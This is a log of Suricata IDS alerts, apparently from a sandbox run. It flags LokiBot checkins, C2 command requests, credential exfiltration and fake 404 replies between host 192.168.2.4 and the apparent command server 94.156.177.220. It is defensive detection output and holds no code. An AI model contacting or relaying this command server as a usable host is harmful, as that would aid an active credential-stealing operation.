Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49751 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49731 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49765 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49776 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49836 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49738
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49811 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49737 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49752 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49752 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49828 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49811 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49737 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49737 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49752 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49737
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49779 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49761
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49883 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49775 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49758
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49883 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49775 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49749 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49779 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49776 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49776 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49842 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49757
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49776 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49776 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49752 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49811
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49771 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49782 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49771 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49782 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49771 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49732 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49780
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49751 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49864 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49864 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49749 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49836 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49805 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49842
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49805 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49734 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49740
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49883 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49822
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49752
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49864 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49732 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49828 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49894 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49751 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49732 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49732 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49828 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49775 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49828 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49836
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49771 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49753 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49779
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49765
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49782 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49894 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49751 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49782 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49782 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49753 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49771 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49749
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49917 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49883 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49883 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49767 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49767 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49767 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49776
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49828
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49736 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49753 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49736 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49736 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49760 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49753 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49734
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49864 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49760 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49760 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49947 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49782
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49736 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49760 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49767 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49760 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49751
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49775 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49768
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49771
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49864 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49954 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49894 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49947 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49741 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49894 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49894 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49864
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49753 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49894
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49954 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49760
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49947 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49767 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49736 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49877 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49877 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49877 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49917 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49954 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49756 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49736
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49756 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49877 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49741 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49756 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49883
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49770 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49770 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49770 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49756 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49756 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49963 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49917 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49917 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49767
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49917 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49917
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49969 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49753
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49754 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49900 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49954 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49877 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49947 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49969 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49947 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49969 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49732
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49754 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49969 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49769 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49754 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49954 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49954
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49900 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49985 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49985 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49963 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49985 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49770 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49770 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49969 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49769 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49805
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49998 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50005 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50005 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50005 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49775
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49762 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49741 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49762 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49877
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49762 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49769 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49985 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49741 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49998 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49900 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49998 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49754 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49963 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49947
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49762 -> 94.156.177.220:80
